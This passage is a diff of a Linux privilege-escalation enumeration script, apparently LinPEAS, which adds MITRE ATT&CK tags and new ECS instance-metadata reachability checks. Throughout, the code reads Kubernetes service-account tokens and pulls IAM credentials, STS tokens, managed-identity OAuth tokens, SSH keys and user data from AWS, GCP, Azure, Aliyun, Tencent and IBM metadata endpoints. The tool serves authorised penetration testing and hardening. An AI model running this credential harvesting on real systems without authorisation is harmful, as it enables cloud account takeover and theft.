"s,docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker,${SED_RED},g" # Kubernetes specific checks if echo "$containerType" | grep -qi "kubernetes"; then - print_3title "Kubernetes Specific Checks" + print_3title "Kubernetes Specific Checks" "T1611" print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html" print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" @@ -2328,7 +3872,7 @@ if [ "$inContainer" ]; then (kubectl get nodes 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN}," fi # Interesting files and mounts - print_3title "Interesting Files & Mounts" + print_3title "Interesting Files & Mounts" "T1611" print_list "Interesting files mounted ........ "$NC (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g" print_list "Possible entrypoints ........... "$NC @@ -2336,11 +3880,14 @@ if [ "$inContainer" ]; then echo "" fi +fi + +if check_mitre_filter "T1611"; then containerCheck if [ "$inContainer" ]; then echo "" - print_2title "Container - Writable bind mounts w/o nosuid (SUID persistence risk)" - print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html#writable-bind-mounts" + print_2title "Container - Writable bind mounts w/o nosuid (SUID persistence risk)" "T1611" + print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/privileged-containers.html#writable-bind-mounts" if [ -r /proc/self/mountinfo ]; then CT_RW_bind_mounts_matches=$(grep -E "(^| )bind( |$)" /proc/self/mountinfo 2>/dev/null | grep -E "(^|,)rw(,|$)" | grep -v "nosuid" || true) else @@ -2363,6 +3910,9 @@ if [ "$inContainer" ]; then echo "" fi +fi + +fi fi echo '' @@ -2370,6 +3920,7 @@ echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS | grep -q cloud; then +if check_mitre_filter "T1552.005,T1580"; then print_title "Cloud" check_gcp check_aws_ecs @@ -2383,6 +3934,7 @@ check_az_app check_az_automation_acc check_aliyun_ecs check_tencent_cvm +if check_mitre_filter "T1580"; then printf "${YELLOW}Learn and practice cloud hacking techniques in ${BLUE}https://training.hacktricks.xyz\n"$NC echo "" print_list "GCP Virtual Machine? ................. $is_gcp_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," @@ -2401,8 +3953,11 @@ print_list "Aliyun ECS? .......................... $is_aliyun_ecs\n"$NC | sed "s print_list "Tencent CVM? ......................... $is_tencent_cvm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," echo "" +fi + +if check_mitre_filter "T1552.005,T1580"; then if [ "$is_aws_ec2" = "Yes" ]; then - print_2title "AWS EC2 Enumeration" + print_2title "AWS EC2 Enumeration" "T1552.005,T1580" TOKEN="" TOKEN_HEADER="X-aws-ec2-metadata-token" TOKEN_TTL="X-aws-ec2-metadata-token-ttl-seconds: 21600" @@ -2427,10 +3982,10 @@ if [ "$is_aws_ec2" = "Yes" ]; then printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo "" printf "region: "; eval $aws_req "$URL/placement/region"; echo "" echo "" - print_3title "Account Info" + print_3title "Account Info" "T1552.005,T1580" exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo "" echo "" - print_3title "Network Info" + print_3title "Network Info" "T1552.005,T1580" for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do echo "Mac: $mac" printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo "" @@ -2444,7 +3999,7 @@ if [ "$is_aws_ec2" = "Yes" ]; then echo "" done echo "" - print_3title "IAM Role" + print_3title "IAM Role" "T1552.005,T1580" exec_with_jq eval $aws_req "$URL/iam/info"; echo "" for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do echo "Role: $role" @@ -2452,19 +4007,22 @@ if [ "$is_aws_ec2" = "Yes" ]; then echo "" done echo "" - print_3title "User Data" + print_3title "User Data" "T1552.005,T1580" eval $aws_req "http://169.254.169.254/latest/user-data"; echo "" echo "" - print_3title "EC2 Security Credentials" + print_3title "EC2 Security Credentials" "T1552.005,T1580" exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo "" - print_3title "SSM Runnig" + print_3title "SSM Runnig" "T1552.005,T1580" ps aux 2>/dev/null | grep "ssm-agent" | grep -Ev "grep|sed s,ssm-agent" | sed "s,ssm-agent,${SED_RED}," fi echo "" fi +fi + +if check_mitre_filter "T1552.005,T1580"; then if [ "$is_aws_ecs" = "Yes" ]; then - print_2title "AWS ECS Enumeration" + print_2title "AWS ECS Enumeration" "T1552.005,T1580" aws_ecs_req="" if [ "$(command -v curl || echo -n '')" ]; then aws_ecs_req='curl -s -f' @@ -2474,27 +4032,161 @@ if [ "$is_aws_ecs" = "Yes" ]; then echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi if [ "$aws_ecs_metadata_uri" ]; then - print_3title "Container Info" + print_3title "Container Info" "T1552.005,T1580" exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri" echo "" - print_3title "Task Info" + print_3title "Task Info" "T1552.005,T1580" exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task" echo "" else echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info" fi if [ "$aws_ecs_service_account_uri" ]; then - print_3title "IAM Role" + print_3title "IAM Role" "T1552.005,T1580" exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri" echo "" else echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)" fi + print_3title "ECS task metadata hints" "T1552.005,T1580" + aws_exec_env=$(printenv AWS_EXECUTION_ENV 2>/dev/null) + if [ "$aws_exec_env" ]; then + printf "AWS_EXECUTION_ENV=%s\n" "$aws_exec_env" + fi + ecs_task_metadata="" + if [ "$aws_ecs_metadata_uri" ]; then + ecs_task_metadata=$(eval $aws_ecs_req "$aws_ecs_metadata_uri/task" 2>/dev/null) + fi + if [ "$ecs_task_metadata" ]; then + launch_type=$(printf "%s" "$ecs_task_metadata" | grep -oE '"LaunchType":"[^"]+"' | head -n 1 | cut -d '"' -f4) + if [ "$launch_type" ]; then + printf "ECS LaunchType reported: %s\n" "$launch_type" + fi + network_modes=$(printf "%s" "$ecs_task_metadata" | grep -oE '"NetworkMode":"[^"]+"' | cut -d '"' -f4 | sort -u | tr '\n' ' ') + if [ "$network_modes" ]; then + printf "Reported NetworkMode(s): %s\n" "$network_modes" + fi + else + echo "Unable to fetch task metadata (check ECS_CONTAINER_METADATA_URI)." + fi + echo "" + print_3title "IMDS reachability from this task" "T1552.005,T1580" + imds_token="" + imds_roles="" + imds_http_code="" + imds_tool="" + if command -v curl >/dev/null 2>&1; then + imds_tool="curl" + elif command -v wget >/dev/null 2>&1; then + imds_tool="wget" + fi + if [ "$imds_tool" = "curl" ]; then + imds_token=$(curl -s --connect-timeout 2 --max-time 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null) + if [ "$imds_token" ]; then + printf "[!] IMDSv2 token request succeeded (metadata reachable from this task).\n" + imds_roles=$(curl -s --connect-timeout 2 --max-time 2 -H "X-aws-ec2-metadata-token: $imds_token" "http://169.254.169.254/latest/meta-data/iam/security-credentials/" 2>/dev/null | tr '\n' ' ') + if [ "$imds_roles" ]; then + printf " Instance profile role(s) exposed via IMDS: %s\n" "$imds_roles" + first_role=$(printf "%s" "$imds_roles" | awk '{print $1}') + if [ "$first_role" ]; then + printf " Example: curl -H 'X-aws-ec2-metadata-token: ' http://169.254.169.254/latest/meta-data/iam/security-credentials/%s\n" "$first_role" + fi + else + printf " No IAM role names returned (instance profile might be missing).\n" + fi + else + imds_http_code=$(curl -s -o /dev/null -w "%{http_code}" --connect-timeout 2 --max-time 2 "http://169.254.169.254/latest/meta-data/" 2>/dev/null) + case "$imds_http_code" in + 000|"") + printf "[i] IMDS endpoint did not respond (likely blocked via hop-limit or host firewalling).\n" + ;; + 401) + printf "[i] IMDS requires v2 tokens but token requests are being blocked (bridge-mode tasks rely on this when hop limit = 1).\n" + ;; + *) + printf "[i] IMDS GET returned HTTP %s (investigate host configuration).\n" "$imds_http_code" + ;; + esac + fi + elif [ "$imds_tool" = "wget" ]; then + imds_token=$(wget -q -O - --timeout=2 --tries=1 --method=PUT --header="X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token" 2>/dev/null) + if [ "$imds_token" ]; then + printf "[!] IMDSv2 token request succeeded (metadata reachable from this task).\n" + imds_roles=$(wget -q -O - --timeout=2 --tries=1 --header="X-aws-ec2-metadata-token: $imds_token" "http://169.254.169.254/latest/meta-data/iam/security-credentials/" 2>/dev/null | tr '\n' ' ') + if [ "$imds_roles" ]; then + printf " Instance profile role(s) exposed via IMDS: %s\n" "$imds_roles" + else + printf " No IAM role names returned (instance profile might be missing).\n" + fi + else + wget --server-response -O /dev/null --timeout=2 --tries=1 "http://169.254.169.254/latest/meta-data/" 2>&1 | awk 'BEGIN{code=""} /^ HTTP/{code=$2} END{ if(code!="") { printf("[i] IMDS GET returned HTTP %s (token could not be retrieved).\n", code); } else { print "[i] IMDS endpoint did not respond (likely blocked)."; } }' + fi + else + echo "Neither curl nor wget were found, I can't test IMDS reachability." + fi + echo "" + print_3title "ECS agent IMDS settings" "T1552.005,T1580" + if [ -r "/etc/ecs/ecs.config" ]; then + ecs_block_line=$(grep -E "^ECS_AWSVPC_BLOCK_IMDS=" /etc/ecs/ecs.config 2>/dev/null | tail -n 1) + ecs_host_line=$(grep -E "^ECS_ENABLE_TASK_IAM_ROLE_NETWORK_HOST=" /etc/ecs/ecs.config 2>/dev/null | tail -n 1) + if [ "$ecs_block_line" ]; then + printf "%s\n" "$ecs_block_line" + if echo "$ecs_block_line" | grep -qi "=true"; then + echo " -> awsvpc-mode tasks should be blocked from IMDS by the ECS agent." + else + echo " -> awsvpc-mode tasks can still reach IMDS (set this to true to block)." + fi + else + echo "ECS_AWSVPC_BLOCK_IMDS not set (awsvpc tasks inherit host IMDS reachability)." + fi + if [ "$ecs_host_line" ]; then + printf "%s\n" "$ecs_host_line" + if echo "$ecs_host_line" | grep -qi "=false"; then + echo " -> Host-network tasks lose IAM task roles but IMDS is blocked." + else + echo " -> Host-network tasks keep IAM task roles and retain IMDS access." + fi + else + echo "ECS_ENABLE_TASK_IAM_ROLE_NETWORK_HOST not set (defaults keep IMDS reachable for host-mode tasks)." + fi + else + echo "Cannot read /etc/ecs/ecs.config (file missing or permissions denied)." + fi + echo "" + print_3title "DOCKER-USER IMDS filtering" "T1552.005,T1580" + iptables_cmd="" + if command -v iptables >/dev/null 2>&1; then + iptables_cmd=$(command -v iptables) + elif command -v iptables-nft >/dev/null 2>&1; then + iptables_cmd=$(command -v iptables-nft) + fi + if [ "$iptables_cmd" ]; then + docker_rules=$($iptables_cmd -S DOCKER-USER 2>/dev/null) + if [ $? -eq 0 ]; then + if [ "$docker_rules" ]; then + echo "$docker_rules" + else + echo "(DOCKER-USER chain exists but no rules were found)" + fi + if echo "$docker_rules" | grep -q "169\\.254\\.169\\.254"; then + echo " -> IMDS traffic is explicitly filtered before Docker NAT." + else + echo " -> No DOCKER-USER rule drops 169.254.169.254 traffic (bridge tasks rely on hop limit or host firewalling)." + fi + else + echo "Unable to read DOCKER-USER chain (missing chain or insufficient permissions)." + fi + else + echo "iptables binary not found; cannot inspect DOCKER-USER chain." + fi echo "" fi +fi + +if check_mitre_filter "T1552.005,T1580"; then if [ "$is_aws_lambda" = "Yes" ]; then - print_2title "AWS Lambda Enumeration" + print_2title "AWS Lambda Enumeration" "T1552.005,T1580" printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME printf "Region: "; env | grep AWS_REGION printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY @@ -2506,8 +4198,11 @@ if [ "$is_aws_lambda" = "Yes" ]; then echo "" fi +fi + +if check_mitre_filter "T1552.005,T1580"; then if [ "$is_aws_codebuild" = "Yes" ]; then - print_2title "AWS Codebuild Enumeration" + print_2title "AWS Codebuild Enumeration" "T1552.005,T1580" aws_req="" if [ "$(command -v curl || echo -n '')" ]; then aws_req="curl -s -f" @@ -2518,17 +4213,20 @@ if [ "$is_aws_codebuild" = "Yes" ]; then echo "The addresses are in /codebuild/output/tmp/env.sh" fi if [ "$aws_req" ]; then - print_3title "Credentials" + print_3title "Credentials" "T1552.005,T1580" CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2) URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig exec_with_jq eval $aws_req "$URL_CREDS"; echo "" - print_3title "Container Info" + print_3title "Container Info" "T1552.005,T1580" METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2) exec_with_jq eval $aws_req "$METADATA_URL"; echo "" fi echo "" fi +fi + +if check_mitre_filter "T1552.005,T1580"; then if [ "$is_gcp_function" = "Yes" ]; then gcp_req="" if [ "$(command -v curl)" ]; then @@ -2540,7 +4238,7 @@ if [ "$is_gcp_function" = "Yes" ]; then fi # GCP Enumeration if [ "$gcp_req" ]; then - print_2title "Google Cloud Platform Enumeration" + print_2title "Google Cloud Platform Enumeration" "T1552.005,T1580" print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html" ## GC Project Info p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id') @@ -2555,7 +4253,7 @@ if [ "$is_gcp_function" = "Yes" ]; then inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone) [ "$inst_zone" ] && echo "Zone: $inst_zone" echo "" - print_3title "Service Accounts" + print_3title "Service Accounts" "T1552.005,T1580" for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do echo " Name: $sa" echo " Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}email") @@ -2568,6 +4266,9 @@ if [ "$is_gcp_function" = "Yes" ]; then fi fi +fi + +if check_mitre_filter "T1552.005,T1580"; then if [ "$is_gcp_vm" = "Yes" ]; then gcp_req="" if [ "$(command -v curl || echo -n '')" ]; then @@ -2578,7 +4279,7 @@ if [ "$is_gcp_vm" = "Yes" ]; then echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi if [ "$gcp_req" ]; then - print_2title "Google Cloud Platform Enumeration" + print_2title "Google Cloud Platform Enumeration" "T1552.005,T1580" print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html" ## GC Project Info p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id') @@ -2628,7 +4329,7 @@ if [ "$is_gcp_vm" = "Yes" ]; then inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env") [ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv" echo "" - print_3title "Interfaces" + print_3title "Interfaces" "T1552.005,T1580" for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do echo " IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip") echo " Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask") @@ -2638,11 +4339,11 @@ if [ "$is_gcp_vm" = "Yes" ]; then echo " ============== " done echo "" - print_3title "User Data" + print_3title "User Data" "T1552.005,T1580" echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script") echo "" echo "" - print_3title "Service Accounts" + print_3title "Service Accounts" "T1552.005,T1580" for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do echo " Name: $sa" echo " Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email") @@ -2656,8 +4357,11 @@ if [ "$is_gcp_vm" = "Yes" ]; then echo "" fi +fi + +if check_mitre_filter "T1552.005,T1580"; then if [ "$is_az_vm" = "Yes" ]; then - print_2title "Azure VM Enumeration" + print_2title "Azure VM Enumeration" "T1552.005,T1580" HEADER="Metadata:true" URL="http://169.254.169.254/metadata" API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions @@ -2670,31 +4374,31 @@ if [ "$is_az_vm" = "Yes" ]; then echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi if [ "$az_req" ]; then - print_3title "Instance details" + print_3title "Instance details" "T1552.005,T1580" exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION" echo "" - print_3title "Load Balancer details" + print_3title "Load Balancer details" "T1552.005,T1580" exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION" echo "" - print_3title "User Data" + print_3title "User Data" "T1552.005,T1580" exec_with_jq eval $az_req "$URL/instance/compute/userData?api-version=$API_VERSION\&format=text" | base64 -d 2>/dev/null echo "" - print_3title "Custom Data and other configs (root needed)" + print_3title "Custom Data and other configs (root needed)" "T1552.005,T1580" (cat /var/lib/waagent/ovf-env.xml || cat /var/lib/waagent/CustomData/ovf-env.xml) 2>/dev/null | sed "s,CustomData.*,${SED_RED}," echo "" - print_3title "Management token" + print_3title "Management token" "T1552.005,T1580" print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm" exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/" echo "" - print_3title "Graph token" + print_3title "Graph token" "T1552.005,T1580" print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm" exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/" echo "" - print_3title "Vault token" + print_3title "Vault token" "T1552.005,T1580" print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm" exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/" echo "" - print_3title "Storage token" + print_3title "Storage token" "T1552.005,T1580" print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm" exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/" echo "" @@ -2702,9 +4406,12 @@ if [ "$is_az_vm" = "Yes" ]; then echo "" fi +fi + +if check_mitre_filter "T1552.005,T1580"; then API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp if [ "$is_az_app" = "Yes" ]; then - print_2title "Azure App Service Enumeration" + print_2title "Azure App Service Enumeration" "T1552.005,T1580" HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER" az_req="" if [ "$(command -v curl || echo -n '')" ]; then @@ -2715,24 +4422,27 @@ if [ "$is_az_app" = "Yes" ]; then echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi if [ "$az_req" ]; then - print_3title "Management token" + print_3title "Management token" "T1552.005,T1580" exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/" echo - print_3title "Graph token" + print_3title "Graph token" "T1552.005,T1580" exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/" echo - print_3title "Vault token" + print_3title "Vault token" "T1552.005,T1580" exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/" echo - print_3title "Storage token" + print_3title "Storage token" "T1552.005,T1580" exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/" fi echo "" fi +fi + +if check_mitre_filter "T1552.005,T1580"; then API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp if [ "$is_az_automation_acc" = "Yes" ]; then - print_2title "Azure Automation Account Service Enumeration" + print_2title "Azure Automation Account Service Enumeration" "T1552.005,T1580" HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER" az_req="" if [ "$(command -v curl || echo -n '')" ]; then @@ -2743,23 +4453,26 @@ if [ "$is_az_automation_acc" = "Yes" ]; then echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi if [ "$az_req" ]; then - print_3title "Management token" + print_3title "Management token" "T1552.005,T1580" exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/" echo - print_3title "Graph token" + print_3title "Graph token" "T1552.005,T1580" exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/" echo - print_3title "Vault token" + print_3title "Vault token" "T1552.005,T1580" exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/" echo - print_3title "Storage token" + print_3title "Storage token" "T1552.005,T1580" exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/" fi echo "" fi +fi + +if check_mitre_filter "T1552.005,T1580"; then if [ "$is_do" = "Yes" ]; then - print_2title "DO Droplet Enumeration" + print_2title "DO Droplet Enumeration" "T1552.005,T1580" do_req="" if [ "$(command -v curl || echo -n '')" ]; then do_req='curl -s -f -L ' @@ -2784,6 +4497,9 @@ if [ "$is_do" = "Yes" ]; then echo "" fi +fi + +if check_mitre_filter "T1552.005,T1580"; then if [ "$is_aliyun_ecs" = "Yes" ]; then aliyun_req="" aliyun_token="" @@ -2797,10 +4513,10 @@ if [ "$is_aliyun_ecs" = "Yes" ]; then echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi if [ "$aliyun_token" ]; then - print_2title "Aliyun ECS Enumeration" + print_2title "Aliyun ECS Enumeration" "T1552.005,T1580" print_info "https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadata" echo "" - print_3title "Instance Info" + print_3title "Instance Info" "T1552.005,T1580" i_hostname=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/hostname) [ "$i_hostname" ] && echo "Hostname: $i_hostname" i_instance_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance-id) @@ -2817,7 +4533,7 @@ if [ "$is_aliyun_ecs" = "Yes" ]; then i_zone_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/zone-id) [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id" echo "" - print_3title "Network Info" + print_3title "Network Info" "T1552.005,T1580" i_pub_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/public-ipv4) [ "$i_pub_ipv4" ] && echo "Public IPv4: $i_pub_ipv4" i_priv_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/private-ipv4) @@ -2842,14 +4558,14 @@ if [ "$is_aliyun_ecs" = "Yes" ]; then echo "=======" done echo "" - print_3title "Service account " + print_3title "Service account " "T1552.005,T1580" for sa in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/"); do echo " Name: $sa" echo " STS Token: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/$sa") echo " ==============" done echo "" - print_3title "Possbile admin ssh Public keys" + print_3title "Possbile admin ssh Public keys" "T1552.005,T1580" for key in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/"); do echo " Name: $key" echo " Key: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/${key}openssh-key") @@ -2858,8 +4574,11 @@ if [ "$is_aliyun_ecs" = "Yes" ]; then fi fi +fi + +if check_mitre_filter "T1552.005,T1580"; then if [ "$is_ibm_vm" = "Yes" ]; then - print_2title "IBM Cloud Enumeration" + print_2title "IBM Cloud Enumeration" "T1552.005,T1580" if ! [ "$IBM_TOKEN" ]; then echo "Couldn't get the metadata token:(" else @@ -2875,20 +4594,23 @@ if [ "$is_ibm_vm" = "Yes" ]; then echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi if [ "$ibm_req" ]; then - print_3title "Instance Details" + print_3title "Instance Details" "T1552.005,T1580" exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" - print_3title "Keys and User data" + print_3title "Keys and User data" "T1552.005,T1580" exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" - print_3title "Placement Groups" + print_3title "Placement Groups" "T1552.005,T1580" exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" - print_3title "IAM credentials" + print_3title "IAM credentials" "T1552.005,T1580" exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" fi fi echo "" fi +fi + +if check_mitre_filter "T1552.005,T1580"; then if [ "$is_tencent_cvm" = "Yes" ]; then tencent_req="" if [ "$(command -v curl)" ]; then @@ -2898,11 +4620,11 @@ if [ "$is_tencent_cvm" = "Yes" ]; then else echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi - print_2title "Tencent CVM Enumeration" + print_2title "Tencent CVM Enumeration" "T1552.005,T1580" print_info "https://cloud.tencent.com/document/product/213/4934" # Todo: print_info "Hacktricks Documents needs to be updated" echo "" - print_3title "Instance Info" + print_3title "Instance Info" "T1552.005,T1580" i_tencent_owner_account=$(eval $tencent_req http://169.254.0.23/latest/meta-data/app-id) [ "$i_tencent_owner_account" ] && echo "Tencent Owner Account: $i_tencent_owner_account" i_hostname=$(eval $tencent_req http://169.254.0.23/latest/meta-data/hostname) @@ -2920,7 +4642,7 @@ if [ "$is_tencent_cvm" = "Yes" ]; then i_zone_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/zone) [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id" echo "" - print_3title "Network Info" + print_3title "Network Info" "T1552.005,T1580" for mac_tencent in $(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/); do echo " Mac: $mac_tencent" echo " Primary IPv4: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/primary-local-ipv4) @@ -2937,24 +4659,27 @@ if [ "$is_tencent_cvm" = "Yes" ]; then echo "=======" done echo "" - print_3title "Service account " + print_3title "Service account " "T1552.005,T1580" for sa_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/"); do echo " Name: $sa_tencent" echo " STS Token: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/$sa_tencent") echo " ==============" done echo "" - print_3title "Possbile admin ssh Public keys" + print_3title "Possbile admin ssh Public keys" "T1552.005,T1580" for key_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/"); do echo " Name: $key_tencent" echo " Key: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/${key_tencent}openssh-key") echo " ==============" done echo "" - print_3title "User Data" + print_3title "User Data" "T1552.005,T1580" eval $tencent_req http://169.254.0.23/latest/user-data; echo "" fi +fi + +fi fi echo '' @@ -2962,9 +4687,11 @@ echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; then +if check_mitre_filter "T1543.002,T1007,T1559,T1571,T1049,T1559.001,T1021.004,T1053.003,T1083,T1057,T1003.007,T1574,T1554,T1134.004,T1543.001"; then print_title "Processes, Crons, Timers, Services and Sockets" +if check_mitre_filter "T1057"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Running processes (cleaned)" + print_2title "Running processes (cleaned)" "T1057" if [ "$NOUSEPS" ]; then printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC fi @@ -3156,7 +4883,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi # Additional checks for each process - print_2title "Processes with unusual configurations" + print_2title "Processes with unusual configurations" "T1057" for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do # Skip if process doesn't exist or we can't access it [ ! -d "/proc/$pid" ] && continue @@ -3182,8 +4909,11 @@ if ! [ 